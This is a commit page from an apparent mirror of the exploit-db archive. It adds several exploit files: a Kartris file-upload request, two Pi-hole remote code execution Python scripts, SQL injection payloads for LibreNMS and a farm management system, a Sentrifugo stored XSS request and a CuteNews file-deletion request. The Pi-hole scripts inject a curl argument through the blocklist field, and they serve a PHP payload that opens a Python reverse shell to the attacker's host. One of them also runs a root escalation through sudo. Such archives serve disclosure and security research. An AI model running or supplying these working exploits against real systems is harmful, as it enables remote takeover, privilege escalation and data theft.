bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-05-12

Browse source 
14 changes to exploits/shellcodes

SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
Pi-hole < 4.4 - Authenticated Remote Code Execution
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation
Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection
Kartris 1.6 - Arbitrary File Upload
Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting
CuteNews 2.1.2 - Arbitrary File Deletion
OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
Victor CMS 1.0 - 'post' SQL Injection
Complaint Management System 1.0 - Authentication Bypass
LibreNMS 1.46 - 'search' SQL Injection
This commit is contained in:
Offensive Security 2020-05-12 05:01:50 +00:00
parent 262c9c3eb6
commit 7cb5d48647
15 changed files with 1066 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

111
exploits/aspx/webapps/48445.txt Normal file
View file

@ -0,0 +1,111 @@
# Exploit Title: Kartris 1.6 - Arbitrary File Upload
# Dork: N/A
# Date: 2020-05-08
# Exploit Author: Nhat Ha - Sun CSR
# Vendor Homepage: https://www.cactusoft.com/
# Software Link: https://www.kartris.com/
# Version: 1.6
# Category: Webapps
# Tested on: WiN10_x64/KaLiLinuX_x64
# CVE: N/A
# POC: https://localhost/Admin/_GeneralFiles.aspx
#
POST /Admin/_GeneralFiles.aspx HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------9604487443072642880454762058
Content-Length: 18484
Origin: 192.168.1.1
Connection: close
Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx
Cookie: __cfduid=d1e56d596943226c869a1186e06b8d8661588757096;
ASP.NET_SessionId=abbnm4jh04wmdbl2gukr5t5w;
KartrisBasket870c8=s=7i7lpj21819; KartrisBackAuth870c8=xxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="scrManager_HiddenField"
;;AjaxControlToolkit, Version=4.1.7.123, Culture=neutral,
PublicKeyToken=28f01b0e84b6d53e:en-GB:57898466-f347-4e5c-9527-24f201596811:475a4ef5:5546a2b:d2e10b12:effe2a26:37e2e5c9:1d3ed089:751cdd15:dfad98a5:497ef277:a43b07eb:3cf12cf1;
-----------------------------9604487443072642880454762058
Content-Disposition: form-data;
name="_UC_CategoryMenu_tvwCategory_ExpandState"
cccccccccc
-----------------------------9604487443072642880454762058
Content-Disposition: form-data;
name="_UC_CategoryMenu_tvwCategory_SelectedNode"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data;
name="_UC_CategoryMenu_tvwCategory_PopulateLog"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$scrManager"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$_UC_AdminSearch$txtSearch"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$phdMain$hidFileNameToDelete"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$phdMain$filUploader";
filename="malicious.aspx"
Content-Type: text/plain
[Content Malicious File Here ! ]
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$splMainPage$hdnWidth"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$splMainPage$hdnMinWidth"
170px
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="ctl00$splMainPage$hdnMaxWidth"
500px
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$phdMain$lnkUpload
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__EVENTARGUMENT"
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__VIEWSTATE"
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
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
54DD7DF0
-----------------------------9604487443072642880454762058
Content-Disposition: form-data; name="__VIEWSTATEENCRYPTED"
-----------------------------9604487443072642880454762058--
# Access malicious file following the link:
https://localhost/uploads/General/malicious.aspx
# How to fix: Update the latest version
# Commit fix:
https://github.com/cactusoft/kartris/commit/e9450dc1f90aa6167f1db1a6f137ea07cacb2a5c

95
exploits/linux/webapps/48442.py Executable file
View file

@ -0,0 +1,95 @@
#!/usr/bin/env python3
# Pi-hole <= 4.4 RCE
# Author: Nick Frichette
# Homepage: https://frichetten.com
#
# Note: This exploit must be run with root privileges and port 80 must not be occupied.
# While it is possible to exploit this from a non standard port, for the sake of
# simplicity (and not having to modify the payload) please run it with sudo privileges.
# Or setup socat and route it through there?
import requests
import sys
import socket
import _thread
import time
if len(sys.argv) < 4:
print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port* *(Optional) root*")
print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
exit()
SESSION = dict(PHPSESSID=sys.argv[1])
TARGET_IP = sys.argv[2]
LOCAL_IP = sys.argv[3]
LOCAL_PORT = sys.argv[4]
if len(sys.argv) == 6:
ROOT = True
# Surpress https verify warnings
# I'm asuming some instances will use self-signed certs
requests.packages.urllib3.disable_warnings()
# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
payload = """<?php
shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'")
?>
""" %(LOCAL_IP, LOCAL_PORT)
def send_response(thread_name):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_IP,int(80)))
sock.listen(5)
connected = False
while not connected:
conn,addr = sock.accept()
if thread_name == "T1":
print("[+] Received First Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
else:
print("[+] Received Second Callback")
print("[+] Uploading Payload")
conn.sendall(bytes(payload, "utf-8"))
conn.close()
connected = True
sock.close()
_thread.start_new_thread(send_response,("T1",))
# Fetch token
resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
response = str(resp.content)
token_loc = response.find("name=\"token\"")
token = response[token_loc+20:token_loc+64]
# Make request with token
data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
if resp.status_code == 200:
print("[+] Put Stager Success")
# Update gravity
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
time.sleep(3)
_thread.start_new_thread(send_response,("T2",))
# Update again to trigger upload
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
print("[+] Triggering Exploit")
try:
requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
except:
# We should be silent to avoid filling the cli window
None

119
exploits/linux/webapps/48443.py Executable file
View file

@ -0,0 +1,119 @@
#!/usr/bin/env python3
# Pi-hole <= 4.4 RCE
# Author: Nick Frichette
# Homepage: https://frichetten.com
#
# Note: This exploit must be run with root privileges and port 80 must not be occupied.
# While it is possible to exploit this from a non standard port, for the sake of
# simplicity (and not having to modify the payload) please run it with sudo privileges.
# Or setup socat and route it through there?
import requests
import sys
import socket
import _thread
import time
if len(sys.argv) < 4:
print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*")
print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.")
exit()
SESSION = dict(PHPSESSID=sys.argv[1])
TARGET_IP = sys.argv[2]
LOCAL_IP = sys.argv[3]
LOCAL_PORT = sys.argv[4]
# Surpress https verify warnings
# I'm asuming some instances will use self-signed certs
requests.packages.urllib3.disable_warnings()
# Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# I opted to use the Python3 reverse shell one liner over the full PHP reverse shell.
shell_payload = """<?php
shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'")
?>
""" %(LOCAL_IP, LOCAL_PORT)
root_payload = """<?php
shell_exec("sudo pihole -a -t")
?>
"""
def send_response(thread_name):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_IP,int(80)))
sock.listen(5)
connected = False
while not connected:
conn,addr = sock.accept()
if thread_name == "T1":
print("[+] Received First Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
elif thread_name == "T2":
print("[+] Received Second Callback")
print("[+] Uploading Root Payload")
conn.sendall(bytes(root_payload, "utf-8"))
elif thread_name == "T3":
print("[+] Received Third Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
else:
print("[+] Received Fourth Callback")
print("[+] Uploading Shell Payload")
conn.sendall(bytes(shell_payload, "utf-8"))
conn.close()
connected = True
sock.close()
_thread.start_new_thread(send_response,("T1",))
# Fetch token
resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
response = str(resp.content)
token_loc = response.find("name=\"token\"")
token = response[token_loc+20:token_loc+64]
# Make request with token
data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
if resp.status_code == 200:
print("[+] Put Root Stager Success")
# Update gravity
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
time.sleep(3)
_thread.start_new_thread(send_response,("T2",))
# Update again to trigger upload of root redirect
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
time.sleep(1)
_thread.start_new_thread(send_response,("T3",))
data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o teleporter.php -d \"","field":"adlists","token":token,"submit":"saveupdate"}
resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False)
if resp.status_code == 200:
print("[+] Put Shell Stager Success")
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
time.sleep(1)
_thread.start_new_thread(send_response,("T4",))
resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False)
print("[+] Triggering Exploit")
try:
requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False)
except:
# We should be silent to avoid filling the cli window
None

55
exploits/multiple/webapps/48453.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: LibreNMS 1.46 - 'search' SQL Injection
# Google Dork:unknown
# Date: 2019-09-01
# Exploit Author: Punt
# Vendor Homepage: https://www.librenms.org
# Software Link: https://www.librenms.org
# Version:1.46 and less
# Tested on:Linux and Windows
# CVE: N/A
#Affected Device: more than 4k found on Shodan and Censys.
#Description about the bug
Vunlerable script /html/ajax_serarch.php
if (isset($_REQUEST['search'])) {
$search = mres($_REQUEST['search']);
header('Content-type: application/json');
if (strlen($search) > 0) {
$found = 0;
if ($_REQUEST['type'] == 'group') {
include_once '../includes/device-groups.inc.php';
foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) {
if ($_REQUEST['map']) {
$results[] = array(
'name' => 'g:'.$group['name'],
'group_id' => $group['id'],
as you can there is a search parameter $search = mres($_REQUEST['search']); which accepts a user input using $_REQUEST['']
dbFetchRows() used to exectute sql query
now lets check the mres() function
the mres() fuction is located under /includes/common.php
function mres($string)
{
return $string; //
global $database_link;
return mysqli_real_escape_string($database_link, $string);
as you can see the mres() function call's the mysqli_real_escape_string() which can be bypassed by '%'
#POC:
1st lgoin to your LibreNMS
2nd go to this /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules
3rd you will see an sql syntax error
The Librenms team have applyed a patch .
Thanks
Punt (From Ethiopia)

2
exploits/php/webapps/48244.txt
View file

@ -6,7 +6,7 @@
# Software Link: https://en.ulicms.de/current_versions.html
# Version: 2020.1
# Tested on: Windows
# CVE : N/A
# CVE : CVE-2020-12704
### Vulnerability : Stored Cross-Site Scripting

2
exploits/php/webapps/48250.txt
View file

@ -7,7 +7,7 @@
https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php
# Version: 4.5.0
# Tested on: Windows
# CVE : N/A
# CVE : CVE-2020-12707
### Vulnerability : Persistent Cross-Site Scripting

2
exploits/php/webapps/48404.txt
View file

@ -6,7 +6,7 @@
# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30
# Version: 9.03.50
# Tested on: Windows
# CVE : N/A
# CVE : CVE-2020-12706
### Vulnerability : Persistent Cross-Site Scripting

48
exploits/php/webapps/48444.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection
# Date: 2020-05-06
# Exploit Author: Tarun Sehgal
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/farm_management_system_in_php_with_source_code.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
---------------------------------------------------------------------------------
#parameter Vulnerable: uname
# Injected Request
#Below request will print database name and MariaDB version.
POST /fms/Login/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Origin: http://localhost
Connection: close
Referer: http://localhost/fms/index.php
Cookie: PHPSESSID=fiiiu7pq9kvhdr770ahd7dejco
Upgrade-Insecure-Requests: 1
uname=admin' OR (SELECT 1935 FROM(SELECT COUNT(*),CONCAT(database(),(SELECT (ELT(1935=1935,1))),0x3a,version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dqgD&pass=admin&category=1
-----------------------------------------------------------------------------------------------------------------------------
#Response
HTTP/1.1 302 Found
Date: Wed, 06 May 2020 13:21:36 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.5
X-Powered-By: PHP/7.4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: error.php
Content-Length: 356
Connection: close
Content-Type: text/html; charset=UTF-8
<b>Warning</b>: mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1' for key 'group_key' in <b>

148
exploits/php/webapps/48446.txt Normal file
View file

@ -0,0 +1,148 @@
# Exploit Title: Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting
# Dork: N/A
# Date: 2020-05-06
# Exploit Author: Vulnerability-Lab
# Vendor: http://www.sentrifugo.com/
# Link: http://www.sentrifugo.com/download
# Version: 3.2
# Category: Webapps
# CVE: N/A
Document Title:
===============
Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2229
Product & Service Introduction:
===============================
http://www.sentrifugo.com/
http://www.sentrifugo.com/download
Affected Product(s):
====================
Sentrifugo
Product: Sentrifugo v3.2 - CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-05-05: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Mahara v19.10.2 CMS web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The persistent vulnerability is located in the `expense_name` parameters
of the `/expenses/expenses/edit` module in the `index.php` file.
Remote attackers with low privileges are able to inject own malicious
persistent script code as expenses entry. The injected code can
be used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector is located
on the application-side. Entries of expenses can be reviewed in the
backend by higher privileged accounts as well.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] index.php/expenses/expenses/edit
Vulnerable Input(s):
[+] Expenses Name
Vulnerable File(s):
[+] index.php
Vulnerable Parameter(s):
[+] expense_name
Affected Module(s):
[+] index.php/expenses/expenses
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Vulnerable Source
<div id="maincontentdiv">
<div id="dialog-confirm" style="display:none;">
<div class="newframe-div">
<div class="new-form-ui height32">
<div class="division">
<input type="text" maxlength="12" id="number_value"
name="number_value"></div>
<span class="errors"
id="errors-contactnumber"></span></div></div></div>
<div id="empstatus-alert" style="display:none;">
<div class="newframe-div"><div id="empstatusmessage"></div></div></div>
<div id="empleaves-alert" style="display:none;">
<div class="newframe-div"><div id="empleavesmessage"></div></div></div>
--- PoC Session Logs [POST] --- (Expenses Inject)
http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
Host: sentrifugo.localhost:8080
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 352
Origin: http://sentrifugo.localhost:8080
Connection: keep-alive
Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87;
_ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443
id=&limit=&offset=&parameter=all&currencyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=&
expense_name=<img src="evil.source"
onload=alert(document.domain)>&category_id=&project_id=&expense_date=&expense_currency_id=2&
expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save
-
POST: HTTP/1.1 200 OK
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.10
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 19284
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Reference(s):
http://sentrifugo.localhost:8080/index.php
http://sentrifugo.localhost:8080/index.php/expenses
http://sentrifugo.localhost:8080/index.php/expenses/expenses/
http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

37
exploits/php/webapps/48447.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion
# Date: 2020-05-08
# Author: Besim ALTINOK
# Vendor Homepage: https://cutephp.com
# Software Link: https://cutephp.com/click.php?cutenews_latest
# Version: v2.1.2 (Maybe it affect other versions)
# Tested on: Xampp
# Credit: İsmail BOZKURT
# Remotely: Yes
Description:
------------------------------------------------------------------------
In the "Media Manager" area, users can do arbitrarily file deletion.
Because the developer did not use the unlink() function as secure. So, can
be triggered this vulnerability by a low user account
Arbitrary File Deletion PoC
--------------------------------------------------------------------------------
POST /cute/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 **********************************
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/cute/index.php
Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022
Upgrade-Insecure-Requests: 1
